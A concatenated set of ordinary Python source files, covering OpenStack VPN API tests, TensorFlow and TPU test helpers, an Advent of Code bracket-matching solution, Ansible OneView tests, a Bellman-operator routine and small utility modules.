self.assertIsInstance(ret_val, api.vpn.IKEPolicy)
@test.create_stubs({neutronclient: ('list_ikepolicies',
'list_ipsec_site_connections')})
def test_ikepolicy_list(self):
ikepolicies = {'ikepolicies': self.ikepolicies.list()}
ikepolicies_dict = {'ikepolicies': self.api_ikepolicies.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_ikepolicies().AndReturn(ikepolicies_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_list(self.request)
for (v, d) in zip(ret_val, ikepolicies['ikepolicies']):
self.assertIsInstance(v, api.vpn.IKEPolicy)
            self.assertEqual(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ikepolicy',
'list_ipsec_site_connections')})
def test_ikepolicy_get(self):
ikepolicy = self.ikepolicies.first()
ikepolicy_dict = {'ikepolicy': self.api_ikepolicies.first()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_ikepolicy(
ikepolicy.id).AndReturn(ikepolicy_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ikepolicy_get(self.request, ikepolicy.id)
self.assertIsInstance(ret_val, api.vpn.IKEPolicy)
@test.create_stubs({neutronclient: ('create_ipsecpolicy',)})
def test_ipsecpolicy_create(self):
ipsecpolicy1 = self.api_ipsecpolicies.first()
form_data = {
'name': ipsecpolicy1['name'],
'description': ipsecpolicy1['description'],
'auth_algorithm': ipsecpolicy1['auth_algorithm'],
'encryption_algorithm': ipsecpolicy1['encryption_algorithm'],
'encapsulation_mode': ipsecpolicy1['encapsulation_mode'],
'lifetime': ipsecpolicy1['lifetime'],
'pfs': ipsecpolicy1['pfs'],
'transform_protocol': ipsecpolicy1['transform_protocol']
}
ipsecpolicy = {'ipsecpolicy': self.api_ipsecpolicies.first()}
neutronclient.create_ipsecpolicy(
{'ipsecpolicy': form_data}).AndReturn(ipsecpolicy)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_create(self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.IPSecPolicy)
@test.create_stubs({neutronclient: ('list_ipsecpolicies',
'list_ipsec_site_connections')})
def test_ipsecpolicy_list(self):
ipsecpolicies = {'ipsecpolicies': self.ipsecpolicies.list()}
ipsecpolicies_dict = {'ipsecpolicies': self.api_ipsecpolicies.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.list_ipsecpolicies().AndReturn(ipsecpolicies_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_list(self.request)
for (v, d) in zip(ret_val, ipsecpolicies['ipsecpolicies']):
self.assertIsInstance(v, api.vpn.IPSecPolicy)
            self.assertEqual(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ipsecpolicy',
'list_ipsec_site_connections')})
def test_ipsecpolicy_get(self):
ipsecpolicy = self.ipsecpolicies.first()
ipsecpolicy_dict = {'ipsecpolicy': self.api_ipsecpolicies.first()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
neutronclient.show_ipsecpolicy(
ipsecpolicy.id).AndReturn(ipsecpolicy_dict)
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecpolicy_get(self.request, ipsecpolicy.id)
self.assertIsInstance(ret_val, api.vpn.IPSecPolicy)
@test.create_stubs({neutronclient: ('create_ipsec_site_connection',)})
def test_ipsecsiteconnection_create(self):
ipsecsiteconnection1 = self.api_ipsecsiteconnections.first()
form_data = {
'name': ipsecsiteconnection1['name'],
'description': ipsecsiteconnection1['description'],
'dpd': ipsecsiteconnection1['dpd'],
'ikepolicy_id': ipsecsiteconnection1['ikepolicy_id'],
'initiator': ipsecsiteconnection1['initiator'],
'ipsecpolicy_id': ipsecsiteconnection1['ipsecpolicy_id'],
'mtu': ipsecsiteconnection1['mtu'],
'peer_address': ipsecsiteconnection1['peer_address'],
'peer_cidrs': ipsecsiteconnection1['peer_cidrs'],
'peer_id': ipsecsiteconnection1['peer_id'],
'psk': ipsecsiteconnection1['psk'],
'vpnservice_id': ipsecsiteconnection1['vpnservice_id'],
'admin_state_up': ipsecsiteconnection1['admin_state_up']
}
ipsecsiteconnection = {'ipsec_site_connection':
self.api_ipsecsiteconnections.first()}
neutronclient.create_ipsec_site_connection(
{'ipsec_site_connection':
form_data}).AndReturn(ipsecsiteconnection)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_create(
self.request, **form_data)
self.assertIsInstance(ret_val, api.vpn.IPSecSiteConnection)
@test.create_stubs({neutronclient: ('list_ipsec_site_connections',
'list_ikepolicies',
'list_ipsecpolicies',
'list_vpnservices')})
def test_ipsecsiteconnection_list(self):
ipsecsiteconnections = {
'ipsec_site_connections': self.ipsecsiteconnections.list()}
ipsecsiteconnections_dict = {
'ipsec_site_connections': self.api_ipsecsiteconnections.list()}
ikepolicies_dict = {'ikepolicies': self.api_ikepolicies.list()}
ipsecpolicies_dict = {'ipsecpolicies': self.api_ipsecpolicies.list()}
vpnservices_dict = {'vpnservices': self.api_vpnservices.list()}
neutronclient.list_ipsec_site_connections().AndReturn(
ipsecsiteconnections_dict)
neutronclient.list_ikepolicies().AndReturn(ikepolicies_dict)
neutronclient.list_ipsecpolicies().AndReturn(ipsecpolicies_dict)
neutronclient.list_vpnservices().AndReturn(vpnservices_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_list(self.request)
for (v, d) in zip(ret_val,
ipsecsiteconnections['ipsec_site_connections']):
self.assertIsInstance(v, api.vpn.IPSecSiteConnection)
            self.assertEqual(v.name, d.name)
self.assertTrue(v.id)
@test.create_stubs({neutronclient: ('show_ipsec_site_connection',
'show_ikepolicy', 'show_ipsecpolicy',
'show_vpnservice')})
def test_ipsecsiteconnection_get(self):
ipsecsiteconnection = self.ipsecsiteconnections.first()
connection_dict = {'ipsec_site_connection':
self.api_ipsecsiteconnections.first()}
ikepolicy_dict = {'ikepolicy': self.api_ikepolicies.first()}
ipsecpolicy_dict = {'ipsecpolicy': self.api_ipsecpolicies.first()}
vpnservice_dict = {'vpnservice': self.api_vpnservices.first()}
neutronclient.show_ipsec_site_connection(
ipsecsiteconnection.id).AndReturn(connection_dict)
neutronclient.show_ikepolicy(
ipsecsiteconnection.ikepolicy_id).AndReturn(ikepolicy_dict)
neutronclient.show_ipsecpolicy(
ipsecsiteconnection.ipsecpolicy_id).AndReturn(ipsecpolicy_dict)
neutronclient.show_vpnservice(
ipsecsiteconnection.vpnservice_id).AndReturn(vpnservice_dict)
self.mox.ReplayAll()
ret_val = api.vpn.ipsecsiteconnection_get(self.request,
ipsecsiteconnection.id)
self.assertIsInstance(ret_val, api.vpn.IPSecSiteConnection)
|
py | b4105a687862b37d24f4b400c7bf360453ceac15 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from pyiree.tf.support import tf_test_utils
import string
import tensorflow.compat.v2 as tf
class StringsModule(tf.Module):
"""A Module for converting a set of ids to the concatenated string."""
def __init__(self):
wordparts = [str(c) for c in string.printable]
self.wordparts = tf.constant(wordparts, tf.string)
@tf.function(input_signature=[
tf.TensorSpec((None, None), dtype=tf.int32),
])
def print_ids(self, ids):
string_tensor = tf.strings.as_string(ids)
tf.print(string_tensor)
@tf.function(input_signature=[
tf.TensorSpec((None, None), dtype=tf.int32),
])
def strings_to_ids(self, ids):
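    # Note: despite the name, this maps id tensors to strings - it gathers the
    # printable character for each id and joins each row into a single string.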
wps = tf.gather(self.wordparts, ids)
return tf.strings.reduce_join(wps, 1)
@tf_test_utils.compile_modules(strings=StringsModule)
class StringsTest(tf_test_utils.SavedModelTestCase):
def test_print_ids(self):
input_ids = np.asarray(
[[12, 10, 29, 28, 94, 15, 24, 27, 94, 25, 21, 10, 34],
[13, 24, 16, 28, 94, 15, 24, 27, 94, 28, 29, 10, 34]])
self.modules.strings.all.print_ids(input_ids)
def test_strings_to_ids(self):
input_ids = np.asarray(
[[12, 10, 29, 28, 94, 15, 24, 27, 94, 25, 21, 10, 34],
[13, 24, 16, 28, 94, 15, 24, 27, 94, 28, 29, 10, 34]])
result = self.modules.strings.all.strings_to_ids(input_ids)
result.assert_all_equal()
if __name__ == "__main__":
if hasattr(tf, "enable_v2_behavior"):
tf.enable_v2_behavior()
tf.test.main()
|
py | b4105c51e007906f8d0231c9b58863d187b7b916 | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.HAU/Sun-ExtA_8/udhr_Latn.HAU_Sun-ExtA_8.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
|
py | b4105cfba87b5fbb9f988ae6f288d6695187a46b | """
--- Day 10: Syntax Scoring ---
You ask the submarine to determine the best route out of the deep-sea cave, but it only replies:
Syntax error in navigation subsystem on line: all of them
All of them?! The damage is worse than you thought. You bring up a copy of the navigation subsystem (your puzzle input).
The navigation subsystem syntax is made of several lines containing chunks. There are one or more chunks on each line,
and chunks contain zero or more other chunks. Adjacent chunks are not separated by any delimiter;
if one chunk stops, the next chunk (if any) can immediately start.
Every chunk must open and close with one of four legal pairs of matching characters:
If a chunk opens with (, it must close with ).
If a chunk opens with [, it must close with ].
If a chunk opens with {, it must close with }.
If a chunk opens with <, it must close with >.
So, () is a legal chunk that contains no other chunks, as is [].
More complex but valid chunks include ([]), {()()()}, <([{}])>, [<>({}){}[([])<>]], and even (((((((((()))))))))).
Some lines are incomplete, but others are corrupted. Find and discard the corrupted lines first.
A corrupted line is one where a chunk closes with the wrong character - that is, where the characters
it opens and closes with do not form one of the four legal pairs listed above.
Examples of corrupted chunks include (], {()()()>, (((()))}, and <([]){()}[{}]). Such a chunk can appear anywhere
within a line, and its presence causes the whole line to be considered corrupted.
For example, consider the following navigation subsystem:
[({(<(())[]>[[{[]{<()<>>
[(()[<>])]({[<{<<[]>>(
{([(<{}[<>[]}>{[]{[(<()>
(((({<>}<{<{<>}{[]{[]{}
[[<[([]))<([[{}[[()]]]
[{[{({}]{}}([{[{{{}}([]
{<[[]]>}<{[{[{[]{()[[[]
[<(<(<(<{}))><([]([]()
<{([([[(<>()){}]>(<<{{
<{([{{}}[<[[[<>{}]]]>[]]
Some of the lines aren't corrupted, just incomplete; you can ignore these lines for now.
The remaining five lines are corrupted:
{([(<{}[<>[]}>{[]{[(<()> - Expected ], but found } instead.
[[<[([]))<([[{}[[()]]] - Expected ], but found ) instead.
[{[{({}]{}}([{[{{{}}([] - Expected ), but found ] instead.
[<(<(<(<{}))><([]([]() - Expected >, but found ) instead.
<{([([[(<>()){}]>(<<{{ - Expected ], but found > instead.
Stop at the first incorrect closing character on each corrupted line.
Did you know that syntax checkers actually have contests to see who can get the high score for syntax errors
in a file? It's true! To calculate the syntax error score for a line,
take the first illegal character on the line and look it up in the following table:
): 3 points.
]: 57 points.
}: 1197 points.
>: 25137 points.
In the above example, an illegal ) was found twice (2*3 = 6 points), an illegal ] was found once (57 points),
an illegal } was found once (1197 points), and an illegal > was found once (25137 points).
So, the total syntax error score for this file is 6+57+1197+25137 = 26397 points!
Find the first illegal character in each corrupted line of the navigation subsystem.
What is the total syntax error score for those errors?
--- Part Two ---
Now, discard the corrupted lines. The remaining lines are incomplete.
Incomplete lines don't have any incorrect characters - instead, they're missing some closing characters at the
end of the line. To repair the navigation subsystem, you just need to figure out the sequence of closing
characters that complete all open chunks in the line.
You can only use closing characters (), ], }, or >), and you must add them in the correct order so that only legal
pairs are formed and all chunks end up closed.
In the example above, there are five incomplete lines:
[({(<(())[]>[[{[]{<()<>> - Complete by adding }}]])})].
[(()[<>])]({[<{<<[]>>( - Complete by adding )}>]}).
(((({<>}<{<{<>}{[]{[]{} - Complete by adding }}>}>)))).
{<[[]]>}<{[{[{[]{()[[[] - Complete by adding ]]}}]}]}>.
<{([{{}}[<[[[<>{}]]]>[]] - Complete by adding ])}>.
Did you know that autocomplete tools also have contests? It's true! The score is determined by considering the
completion string character-by-character. Start with a total score of 0. Then, for each character,
multiply the total score by 5 and then increase the total score by the point value given for the
character in the following table:
): 1 point.
]: 2 points.
}: 3 points.
>: 4 points.
So, the last completion string above - ])}> - would be scored as follows:
Start with a total score of 0.
Multiply the total score by 5 to get 0, then add the value of ] (2) to get a new total score of 2.
Multiply the total score by 5 to get 10, then add the value of ) (1) to get a new total score of 11.
Multiply the total score by 5 to get 55, then add the value of } (3) to get a new total score of 58.
Multiply the total score by 5 to get 290, then add the value of > (4) to get a new total score of 294.
The five lines' completion strings have total scores as follows:
}}]])})] - 288957 total points.
)}>]}) - 5566 total points.
}}>}>)))) - 1480781 total points.
]]}}]}]}> - 995444 total points.
])}> - 294 total points.
Autocomplete tools are an odd bunch: the winner is found by sorting all of the scores and then taking the middle score.
(There will always be an odd number of scores to consider.) In this example,
the middle score is 288957 because there are the same number of scores smaller and larger than it.
Find the completion string for each incomplete line, score the completion strings, and sort the scores.
What is the middle score?
"""
from pathlib import Path
# Map of every opening token to it's closer
PAIRS = {"(": ")", "[": "]", "{": "}", "<": ">"}
# Map of the closing tokens to their syntax error score
SYNTAX_SCORES = {")": 3, "]": 57, "}": 1197, ">": 25137}
# Map of the closing tokens to their autocomplete score
COMPLETION_SCORES = {")": 1, "]": 2, "}": 3, ">": 4}
def first_illegal_character(text: str) -> str | None:
"""
    Finds and returns the first illegal character in `text`,
    returning None if there are no illegal characters.
"""
stack: list[str] = []
for char in text:
if char in PAIRS:
# If the character is an opening token, push it onto the stack
stack.append(char)
else:
# If the character is a closing token and the stack is empty
# or if it's not the closing token for what's at the top of the
# stack, return the character
if not stack or PAIRS[stack.pop()] != char:
return char
return None
def calculate_syntax_score(line: str) -> int:
"""
Calculates the syntax error score for a line.
"""
if illegal := first_illegal_character(line):
return SYNTAX_SCORES[illegal]
return 0
def complete(line: str) -> list[str]:
"""
    Figures out which tokens are needed to complete the line
    and returns them as a list in the correct order.
"""
if char := first_illegal_character(line):
raise ValueError(
f"Illegal character {char!r} found at index {line.index(char)}"
)
# Similar process to before
stack: list[str] = []
for char in line:
if char in PAIRS:
# If it's an opening token, push it onto the stack
stack.append(char)
else:
            # Must be a closing token; if it doesn't close whatever is at the
            # top of the stack, we've done something wrong
            expected = PAIRS[stack.pop()]
            if char != expected:
                raise ValueError(
                    f"Incorrect closing token: got {char!r}, expected"
                    f" {expected!r}"
                )
# Flip the stack around and get the closing token for each
return [PAIRS[char] for char in reversed(stack)]
def calculate_completion_score(completion: list[str]) -> int:
"""
Calculates the completion score for a line of completions.
"""
score = 0
for char in completion:
score *= 5
score += COMPLETION_SCORES[char]
return score
def get_middle(lines: list[str]) -> int:
"""
Gets the middle completion score.
"""
scores = [
calculate_completion_score(complete(line))
for line in lines
if first_illegal_character(line) is None
]
# Puzzle says there is always an odd number of scores
if len(scores) % 2 != 1:
raise ValueError("Got an even number of scores!")
return sorted(scores)[len(scores) // 2]
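# Illustrative self-check (added for clarity, not part of the original solution).
# It runs the functions above on the worked example from the puzzle text; the
# expected totals (26397 and 288957) come straight from that text.
def run_example() -> None:
    sample = [
        "[({(<(())[]>[[{[]{<()<>>",
        "[(()[<>])]({[<{<<[]>>(",
        "{([(<{}[<>[]}>{[]{[(<()>",
        "(((({<>}<{<{<>}{[]{[]{}",
        "[[<[([]))<([[{}[[()]]]",
        "[{[{({}]{}}([{[{{{}}([]",
        "{<[[]]>}<{[{[{[]{()[[[]",
        "[<(<(<(<{}))><([]([]()",
        "<{([([[(<>()){}]>(<<{{",
        "<{([{{}}[<[[[<>{}]]]>[]]",
    ]
    assert sum(calculate_syntax_score(line) for line in sample) == 26397
    assert get_middle(sample) == 288957
    print("Worked example passes")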
if __name__ == "__main__":
HERE = Path(__file__).parent.resolve()
INPUT = HERE / "day10.txt"
with open(INPUT) as f:
lines = f.read().strip().splitlines()
print(f"Part 1: {sum(calculate_syntax_score(line) for line in lines)}")
print()
print(f"Part 2: {get_middle(lines)}")
|
py | b4105e35d1b0fda264dcc707534ff45f9c9f9e14 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A convenience wrapper around tf.test.TestCase to enable TPU tests."""
import os
import tensorflow as tf
from tensorflow.contrib import tpu
flags = tf.app.flags
flags.DEFINE_bool('tpu_test', False, 'Whether to configure test for TPU.')
FLAGS = flags.FLAGS
# BEGIN GOOGLE-INTERNAL
def hlo_memory_profile(function):
"""Decorator to set environment variables that produce XLA HLO memory profile.
Args:
function: A function to run with XLA HLO profiling on.
Returns:
A decorated function that dumps the XLA HLO memory profile in test output
directory.
Usage:
@test_case.hlo_memory_profile
def test_run_my_tf_tpu_op(self):
...
After running the test, access the memory profile proto from output files
and generate visualization using XLA memory visualizer.
"""
def wrapper_func(*args, **kwargs):
outputs_dir = os.environ['TEST_UNDECLARED_OUTPUTS_DIR']
path_to_function = os.path.join(outputs_dir, 'hlo_memory_profile',
function.__name__)
os.environ['TF_XLA_FLAGS'] = (
'--xla_dump_optimized_hlo_proto_to=' + path_to_function)
return function(*args, **kwargs)
return wrapper_func
# END GOOGLE-INTERNAL
class TestCase(tf.test.TestCase):
"""Extends tf.test.TestCase to optionally allow running tests on TPU."""
def execute_tpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on TPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
tpu_computation = tpu.rewrite(graph_fn, placeholders)
sess.run(tpu.initialize_system())
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(tpu_computation,
feed_dict=dict(zip(placeholders, inputs)))
sess.run(tpu.shutdown_system())
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute_cpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on CPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
results = graph_fn(*placeholders)
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(results, feed_dict=dict(zip(placeholders,
inputs)))
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute(self, graph_fn, inputs):
"""Constructs the graph, creates a test session and returns the results.
The graph is executed either on TPU or CPU based on the `tpu_test` flag.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
if FLAGS.tpu_test:
return self.execute_tpu(graph_fn, inputs)
else:
return self.execute_cpu(graph_fn, inputs)
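# Illustrative usage sketch (added for clarity; not part of the original
# module). The op and input shapes below are hypothetical.
class _ExampleAddTest(TestCase):
  def test_add(self):
    import numpy as np  # numpy is only needed for this example
    def graph_fn(a, b):
      return a + b
    inputs = [np.ones((2, 2), np.float32), 2 * np.ones((2, 2), np.float32)]
    result = self.execute(graph_fn, inputs)  # CPU or TPU, per the tpu_test flag
    self.assertAllClose(result, 3 * np.ones((2, 2)))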
|
py | b4105e70d0ae4cf69034825c8840daaaccc2bf3c | class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MovementError(Error):
"""Exception for invalid movement on the game board"""
pass |
py | b4105fcbdc91a8cfd66e16f775967726848e2a1d | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, HiddenField #, PasswordField, BooleanField
from wtforms.validators import DataRequired
class TagForm(FlaskForm):
newsgroupA = HiddenField('newsgroupA')
tagA = StringField('tag') # , validators=[DataRequired()]
newsgroupB = HiddenField('newsgroupB')
tagB = StringField('tag')
submit = SubmitField('Submit') |
py | b4106043994032aee57b416edf12efefcd03aada | ###############################################################
# pytest -v --capture=no tests/test_05_userdata.py
# pytest -v tests/test_05_userdata.py
# pytest -v --capture=no tests/test_05_userdata.py::Test_Userdata::test_empty_conf
###############################################################
import pytest
import yaml
from cloudmesh.burn.ubuntu.userdata import Userdata
from cloudmesh.common.util import HEADING
@pytest.mark.incremental
class Test_Userdata:
def test_empty_conf(self):
HEADING()
d = Userdata()
correct = {}
correct = Userdata.HEADER + '\n' + yaml.dump(correct)
assert(correct == str(d))
def test_method_order(self):
HEADING()
d = Userdata().with_default_user().with_hostname(hostname='pytest').with_locale().with_ssh_password_login()
e = Userdata().with_hostname(hostname='pytest').with_locale().with_ssh_password_login().with_default_user()
f = Userdata().with_locale().with_ssh_password_login().with_default_user().with_hostname(hostname='pytest')
g = Userdata().with_ssh_password_login().with_default_user().with_hostname(hostname='pytest').with_locale()
d, e, f, g = d.content, e.content, f.content, g.content
assert(d == e)
assert(e == f)
assert(f == g)
|
py | b410606465e6a379826dd7f9bf2956dd2111a1c5 | # Copyright (c) 2016-2017 Hewlett Packard Enterprise Development LP
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.community.general.tests.unit.compat import unittest, mock
from .hpe_test_utils import OneViewBaseTestCase
from .oneview_module_loader import NetworkSetModule
FAKE_MSG_ERROR = 'Fake message error'
NETWORK_SET = dict(
name='OneViewSDK Test Network Set',
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc']
)
NETWORK_SET_WITH_NEW_NAME = dict(name='OneViewSDK Test Network Set - Renamed')
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name=NETWORK_SET['name'],
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc'])
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name=NETWORK_SET['name'],
newName=NETWORK_SET['name'] + " - Renamed",
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc', 'Name of a Network'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name=NETWORK_SET['name'])
)
class NetworkSetModuleSpec(unittest.TestCase,
OneViewBaseTestCase):
"""
    OneViewBaseTestCase provides common tests for the class constructor and
    main function, as well as the mocks used in this test case.
"""
def setUp(self):
self.configure_mocks(self, NetworkSetModule)
self.resource = self.mock_ov_client.network_sets
self.ethernet_network_client = self.mock_ov_client.ethernet_networks
def test_should_create_new_network_set(self):
self.resource.get_by.return_value = []
self.resource.create.return_value = NETWORK_SET
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_CREATED,
ansible_facts=dict(network_set=NETWORK_SET)
)
def test_should_not_update_when_data_is_equals(self):
self.resource.get_by.return_value = [NETWORK_SET]
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=NetworkSetModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(network_set=NETWORK_SET)
)
def test_update_when_data_has_modified_attributes(self):
data_merged = dict(name=NETWORK_SET['name'] + " - Renamed",
networkUris=['/rest/ethernet-networks/aaa-bbb-ccc',
'/rest/ethernet-networks/ddd-eee-fff']
)
self.resource.get_by.side_effect = [NETWORK_SET], []
self.resource.update.return_value = data_merged
self.ethernet_network_client.get_by.return_value = [{'uri': '/rest/ethernet-networks/ddd-eee-fff'}]
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_UPDATED,
ansible_facts=dict(network_set=data_merged)
)
def test_should_raise_exception_when_ethernet_network_not_found(self):
self.resource.get_by.side_effect = [NETWORK_SET], []
self.ethernet_network_client.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
NetworkSetModule().run()
self.mock_ansible_module.fail_json.assert_called_once_with(
exception=mock.ANY,
msg=NetworkSetModule.MSG_ETHERNET_NETWORK_NOT_FOUND + "Name of a Network"
)
def test_should_remove_network(self):
self.resource.get_by.return_value = [NETWORK_SET]
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=NetworkSetModule.MSG_DELETED
)
def test_should_do_nothing_when_network_set_not_exist(self):
self.resource.get_by.return_value = []
self.mock_ansible_module.params = PARAMS_FOR_ABSENT
NetworkSetModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=NetworkSetModule.MSG_ALREADY_ABSENT
)
def test_update_scopes_when_different(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = NETWORK_SET.copy()
resource_data['scopeUris'] = ['fake']
resource_data['uri'] = 'rest/network-sets/fake'
self.resource.get_by.return_value = [resource_data]
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
self.resource.patch.return_value = patch_return
NetworkSetModule().run()
self.resource.patch.assert_called_once_with('rest/network-sets/fake',
operation='replace',
path='/scopeUris',
value=['test'])
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(network_set=patch_return),
msg=NetworkSetModule.MSG_UPDATED
)
def test_should_do_nothing_when_scopes_are_the_same(self):
params_to_scope = PARAMS_FOR_PRESENT.copy()
params_to_scope['data']['scopeUris'] = ['test']
self.mock_ansible_module.params = params_to_scope
resource_data = NETWORK_SET.copy()
resource_data['scopeUris'] = ['test']
self.resource.get_by.return_value = [resource_data]
NetworkSetModule().run()
self.resource.patch.not_been_called()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(network_set=resource_data),
msg=NetworkSetModule.MSG_ALREADY_PRESENT
)
if __name__ == '__main__':
unittest.main()
|
py | b410607c95fd2d6015c6344926a167413fbd0abc | import numpy as np
from scipy.optimize import fminbound
def bellman_operator(w, grid, β, u, f, shocks, Tw=None, compute_policy=0):
"""
The approximate Bellman operator, which computes and returns the
updated value function Tw on the grid points. An array to store
the new set of values Tw is optionally supplied (to avoid having to
allocate new arrays at each iteration). If supplied, any existing data in
Tw will be overwritten.
Parameters
----------
w : array_like(float, ndim=1)
The value of the input function on different grid points
grid : array_like(float, ndim=1)
The set of grid points
β : scalar
The discount factor
u : function
The utility function
f : function
The production function
shocks : numpy array
An array of draws from the shock, for Monte Carlo integration (to
compute expectations).
Tw : array_like(float, ndim=1) optional (default=None)
Array to write output values to
compute_policy : Boolean, optional (default=False)
Whether or not to compute policy function
"""
# === Apply linear interpolation to w === #
w_func = lambda x: np.interp(x, grid, w)
# == Initialize Tw if necessary == #
if Tw is None:
Tw = np.empty_like(w)
if compute_policy:
σ = np.empty_like(w)
# == set Tw[i] = max_c { u(c) + β E w(f(y - c) z)} == #
for i, y in enumerate(grid):
def objective(c):
return - u(c) - β * np.mean(w_func(f(y - c) * shocks))
c_star = fminbound(objective, 1e-10, y)
if compute_policy:
σ[i] = c_star
Tw[i] = - objective(c_star)
if compute_policy:
return Tw, σ
else:
return Tw
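# Minimal usage sketch (illustrative, not part of the original module). It
# assumes log utility, Cobb-Douglas production f(k) = k**alpha and lognormal
# shocks; the parameter values below are hypothetical.
if __name__ == '__main__':
    grid = np.linspace(1e-5, 4, 200)
    shocks = np.exp(0.1 * np.random.randn(250))
    w = 5 * np.log(grid)  # an arbitrary initial guess
    Tw, σ = bellman_operator(w, grid, β=0.96, u=np.log,
                             f=lambda k: k**0.4, shocks=shocks,
                             compute_policy=True)
    print(Tw[:5], σ[:5])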
|
py | b410613d70d4ede91f363203915afcfa521faeae | from __future__ import with_statement
import os
import os.path
try:
import unittest2 as unittest
except ImportError:
import unittest
from fabric.api import *
from fabric.state import connections
import fabtools
from fabtools import require
def version():
"""
Get the vagrant version as a tuple
"""
with settings(hide('running')):
res = local('vagrant --version', capture=True)
ver = res.split()[2]
return tuple(map(int, ver.split('.')))
def halt_and_destroy():
